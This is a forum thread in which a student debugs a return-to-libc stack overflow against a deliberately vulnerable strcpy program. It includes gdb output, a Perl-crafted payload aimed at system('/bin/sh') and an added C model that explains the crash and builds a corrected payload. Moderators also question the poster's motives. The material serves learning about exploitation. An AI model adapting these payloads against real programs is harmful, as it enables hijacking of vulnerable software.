-
July 19th, 2007, 09:38 PM
#1
Junior Member
Problem with simple return-to-libc exploit.
I'm experimenting with some basic exploits and need some help.
Here is the standard-issue code, exploit.c:
Code:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
    char buffer[5];              /* 5-byte stack buffer */
    //buffer[0] = 1;
    //buffer[5] = 0;
    strcpy(buffer, argv[1]);     /* unbounded copy of argv[1]: the overflow under study */
    return 0;
}
It will be obvious what I'm trying to do, but I'll explain anyway.
I want to craft a buffer and feed it to ./exploit so that the call to strcpy() will overwrite the stack frame belonging to main, and execution can be redirected to the system() call in libc.
Here are the steps I have taken.
I want system() to spawn me a shell, so I need to pass it the argument "/bin/sh", which I've stored in an environment variable:
And written a simple program to return the address of the variable in memory using the getenv() function:
$ ./getenv BINSH
BINSH @ 0xbffffc86
To find the address of system() I've used gdb:
Note that address space randomization has been turned off.
$ gdb -q exploit
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) run aaaa
Starting program: ........../exploit aaaa
Program exited normally.
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ede030 <system>
(gdb) quit
To find out how much garbage to put at the start of the buffer I looked at the output from gcc, exploit.s:
Code:
.file "exploit.c"
.text
.globl main
.type main, @function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $36, %esp
movl 4(%ecx), %eax
addl $4, %eax
movl (%eax), %eax
movl %eax, 4(%esp)
leal -9(%ebp), %eax
movl %eax, (%esp)
call strcpy
movl $0, %eax
addl $36, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
.size main, .-main
.ident "GCC: (GNU) 4.1.2 (Gentoo 4.1.2)"
.section .note.GNU-stack,"",@progbits
It looks as though buffer[0] is located 9 bytes from the saved frame pointer. I execute the exploit code with a crafted buffer as follows:
$ ./exploit `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
Segmentation fault
......nothing. No new shell.
This is despite the fact that I know EIP is getting overwritten. According to gdb:
$ gdb -q exploit
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x08048374 <main+0>: lea 0x4(%esp),%ecx
0x08048378 <main+4>: and $0xfffffff0,%esp
0x0804837b <main+7>: pushl 0xfffffffc(%ecx)
0x0804837e <main+10>: push %ebp
0x0804837f <main+11>: mov %esp,%ebp
0x08048381 <main+13>: push %ecx
0x08048382 <main+14>: sub $0x24,%esp
0x08048385 <main+17>: mov 0x4(%ecx),%eax
0x08048388 <main+20>: add $0x4,%eax
0x0804838b <main+23>: mov (%eax),%eax
0x0804838d <main+25>: mov %eax,0x4(%esp)
0x08048391 <main+29>: lea 0xfffffff7(%ebp),%eax
0x08048394 <main+32>: mov %eax,(%esp)
0x08048397 <main+35>: call 0x80482c0 <strcpy@plt>
0x0804839c <main+40>: mov $0x0,%eax
0x080483a1 <main+45>: add $0x24,%esp
0x080483a4 <main+48>: pop %ecx
0x080483a5 <main+49>: pop %ebp
0x080483a6 <main+50>: lea 0xfffffffc(%ecx),%esp
0x080483a9 <main+53>: ret
End of assembler dump.
(gdb) break *0x0804839c
Breakpoint 1 at 0x804839c
(gdb) run `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
Starting program: ........./exploit `perl -e 'print "A"x13 . "\x30\xe0\xed\xb7AAAA\x86\xfc\xff\xbf";'`
Breakpoint 1, 0x0804839c in main ()
(gdb) info frame
Stack level 0, frame at 0xbffff230:
eip = 0x804839c in main; saved eip 0xb7ede030
Arglist at 0xbffff228, args:
Locals at 0xbffff228, Previous frame's sp is 0xfffffdb9
Saved registers:
ecx at 0xbffff224, ebp at 0xbffff228, eip at 0xbffff22c
(gdb)
So what am I doing wrong? Have I crafted the stack frame incorrectly? What am I missing?
Are you still reading?
Any insight or pointers in the right direction are greatly appreciated.
Here is some more information about my system that might be useful.
$ uname -a
Linux localhost 2.6.20-gentoo-r8 #1 Wed Jul 11 01:17:44 GMT 2007 i686 Mobile AMD Sempron(tm) Processor 3400+ AuthenticAMD GNU/Linux
$ gcc --version
gcc (GCC) 4.1.2 (Gentoo 4.1.2)
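As an added illustration (this is not part of the original post and not the poster's code), the following C models the frame layout implied by the posted disassembly and replays the epilogue over the posted payload. The thing to notice in the assembly is that the epilogue restores %esp from the saved %ecx (lea -4(%ecx),%esp), not from %ebp, so the word that ret actually pops is read from [ecx-4], and the saved-%ecx slot sits at buffer+5, inside the 13 filler bytes. The system() and BINSH addresses are the ones from the post; the buffer address is an assumption derived from the "info frame" output (ebp 0xbffff228 minus 9) and will differ outside gdb. The code does 32-bit little-endian bookkeeping only; it executes nothing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Frame of main() as compiled by the poster's GCC 4.1.2, read off the
 * disassembly in the post (offsets relative to %ebp inside main):
 *
 *   ebp-9  buffer[0..4]             lea -9(%ebp),%eax
 *   ebp-4  saved %ecx               pushl %ecx   (ecx = entry %esp + 4)
 *   ebp+0  saved %ebp               pushl %ebp
 *   ebp+4  copy of return address   pushl -4(%ecx)
 *
 * Epilogue: add $36,%esp ; pop %ecx ; pop %ebp ; lea -4(%ecx),%esp ; ret
 * So ret pops from [ecx-4], where ecx was just reloaded from ebp-4,
 * a slot the overflow overwrites.
 */
#define OFF_SAVED_ECX   5u      /* (ebp-4) - (ebp-9) */
#define OFF_SAVED_EBP   9u
#define OFF_COPIED_RET 13u
#define OFF_FAKE_RET   17u
#define OFF_ARG        21u
#define PAYLOAD_LEN    25u

/* Values the poster obtained with ASLR off; they are environment-specific. */
#define SYSTEM_ADDR 0xb7ede030u
#define BINSH_ADDR  0xbffffc86u
#define FAKE_RET    0x41414141u
/* Assumed buffer address: ebp (0xbffff228 from "info frame") minus 9.
 * Outside gdb it differs because the environment block differs. */
#define BUF_ADDR    0xbffff21fu

static void put32(uint8_t *p, uint32_t v) {          /* little-endian store */
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *p) {            /* little-endian load */
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* The post's payload: "A"x13, &system, "AAAA", &"/bin/sh". */
size_t build_naive_payload(uint8_t *out) {
    memset(out, 'A', OFF_COPIED_RET);
    put32(out + OFF_COPIED_RET, SYSTEM_ADDR);
    put32(out + OFF_FAKE_RET, FAKE_RET);
    put32(out + OFF_ARG, BINSH_ADDR);
    return PAYLOAD_LEN;
}

/* Same layout, but the saved-%ecx slot is chosen so that lea -4(%ecx),%esp
 * lands %esp on the &system word inside the buffer itself. */
size_t build_fixed_payload(uint8_t *out, uint32_t buf_addr) {
    build_naive_payload(out);
    put32(out + OFF_SAVED_ECX, buf_addr + OFF_COPIED_RET + 4);
    return PAYLOAD_LEN;
}

struct ret_state {
    uint32_t ecx;        /* value restored by pop %ecx */
    uint32_t esp;        /* %esp after lea -4(%ecx),%esp, where ret reads */
    int      in_buffer;  /* 1 if that %esp points into bytes we control */
    uint32_t eip;        /* address ret jumps to (valid if in_buffer) */
    uint32_t arg0;       /* [esp+4] as seen by the callee (valid if in_buffer) */
};

/* Replay the epilogue over the bytes strcpy() left behind. Memory outside
 * the payload is unknown to this model, so reads there count as a fault. */
struct ret_state simulate_epilogue(const uint8_t *buf, size_t len, uint32_t buf_addr) {
    struct ret_state s = {0, 0, 0, 0, 0};
    s.ecx = get32(buf + OFF_SAVED_ECX);   /* pop %ecx */
    s.esp = s.ecx - 4;                    /* lea -4(%ecx),%esp (32-bit wrap) */
    uint32_t off = s.esp - buf_addr;      /* wraps to a huge value if below */
    if (off < len && len - off >= 12) {   /* ret word, callee's ret word, arg */
        s.in_buffer = 1;
        s.eip  = get32(buf + off);        /* ret pops this */
        s.arg0 = get32(buf + off + 8);    /* callee: [esp] ret addr, [esp+4] arg */
    }
    return s;
}

/* strcpy() stops at the first NUL, so any zero byte truncates the payload. */
int payload_has_nul(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0) return 1;
    return 0;
}

int main(void) {
    uint8_t p[PAYLOAD_LEN];
    size_t n = build_naive_payload(p);
    struct ret_state s = simulate_epilogue(p, n, BUF_ADDR);
    printf("naive: ecx=%08x esp=%08x -> %s\n", s.ecx, s.esp,
           s.in_buffer ? "inside payload" : "outside payload (SIGSEGV)");
    n = build_fixed_payload(p, BUF_ADDR);
    s = simulate_epilogue(p, n, BUF_ADDR);
    printf("fixed: ecx=%08x esp=%08x eip=%08x arg=%08x nul=%d\n",
           s.ecx, s.esp, s.eip, s.arg0, payload_has_nul(p, n));
    return 0;
}
```

With the posted bytes, pop %ecx yields 0x41414141 and ret reads from 0x4141413d, which is unmapped, matching the segfault; gdb's "saved eip 0xb7ede030" is read from ebp+4, a slot this epilogue never uses. With the saved-%ecx slot pointing four bytes past the &system word, ret reads from the buffer at 0xbffff22c (the same slot gdb lists as "eip at 0xbffff22c") and the callee finds the "/bin/sh" pointer at [esp+4]. The NUL check matters because strcpy() is the copying primitive, and the assumed buffer address must be re-measured outside gdb.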
-
July 19th, 2007, 10:02 PM
#2
My dear "Prince of the pudding race" (Rabbie Burns), I have allowed this post on the grounds that we are a security site.
Sorry that I am not technically competent to answer your question.
cheers
-
July 19th, 2007, 10:17 PM
#3
Before I answer or attempt to, can I ask from what viewpoint you are interested in exploits, to use them to gain system access or understand them to prevent?
-
July 20th, 2007, 10:08 AM
#4
Junior Member
Do you care?
I have no desire to learn, from you or anyone else here, how to break into people's computers; nor to understand exploits with a view to preventing them (as I never write code that appears in the public domain). I simply wish to understand these techniques.
No-one is going to gain root access with this exploit anyway (as system() drops privileges).
So please don't give me your rite-of-passage question-and-answer-session bull***t. If you think I'm some nasty wannabe hacker (or whatever) who is going to try to do lots of nasty stuff, then simply don't post anything. I'll learn the techniques myself eventually; I just wondered if there might be any support out there, or anyone who shared an interest and wanted to engage in some intelligent discussion.
But please, don't post crap like that.
-
July 20th, 2007, 10:45 AM
#5
Originally Posted by Haggis
Do you care?
Wouldn't have asked if I didn't!
Originally Posted by Haggis
But please, don't post crap like that
No prob, I won't.
-
July 20th, 2007, 10:49 AM
#6
Yes, strange though it might seem, we actually do..........
Believe it or not, we get so many "how do I hack my girlfriend's Hotmail account" or online Viagra adverts and all that crap..............
I made a personal decision that you were a genuine guy who would contribute to our forums........... please don't prove me wrong, and do lose the chip on your shoulder.
I have no desire to learn, from you or anyone else here
Why did you join then?
If you cannot code, perhaps you should consider a career in selling icecream?
If you have no intellectual humility perhaps you should go elsewhere?
Up to you my "prince of the pudding race"
-
July 20th, 2007, 11:16 AM
#7
Originally Posted by nihil
do lose the chip on your shoulder.
Agreed!
You'll find people more willing to help then.
And from what I've seen - there are def people who can!
If you cannot code, perhaps you should consider a career in selling icecream?
Ha.
But I do agree with nihil - you seem to be genuinely interested, so an adjustment in attitude would really help.
-
July 20th, 2007, 11:27 AM
#8
I found the link below an interesting read, might help you.
[Edit] Link removed as I don't like posting in public forums. Check your PM.[/Edit]
Provided as a gesture of good faith!
-
July 20th, 2007, 04:22 PM
#9
Junior Member
I do beg your pardon, I may have been a bit quick off the mark. There was no need to respond like that and I apologize - if not for causing offence, then certainly for bringing down the intelligence of the forum.
Please do not quote me out of context; I'm sure you're well aware of the point I was making. I have no desire to "hack my girlfriend's Hotmail" (incidentally, we have quite a good relationship, and I am granted free access to her account for my own use).
I am genuine. A student from Glasgow, studying a mixture of electronics and computer science. I have been programming for some time and have recently become interested in how programs are exploited, in particular how execution can be controlled and redirected. I have come across a stumbling block, however, and required some help understanding it. I thought this would be a good thread for people who are in the same position but didn't know who to ask, as I am aware the resources for this type of exploit go out of date quite quickly.
This is advertised as a "Security" forum, with a section in particular on "Programming Security". I would have thought the bulk of the discussion here would centre upon buffer overflows, format string exploits etc., which doesn't seem to be the case. Hence I have started a thread where hopefully people with enough intelligence will be able to follow a very basic (and relatively un-dangerous) exploit from start to finish. To that end, then, I invite anyone with the knowledge and desire to please contribute.
Thank you for the link WolfeTone. I have not yet looked at it but certainly will!
-
July 21st, 2007, 03:07 AM
#10
You don't have any shellcode or anything. You're just calling system() with no arguments. It needs a command to execute. You need to get the address of a string with the command you want on the stack before you call it. I've never seen anyone do it that way though. I've only seen people put the actual machine code to exec a shell in memory and have it return to that. I'm sure the link provided to you will give you a good understanding. Good luck.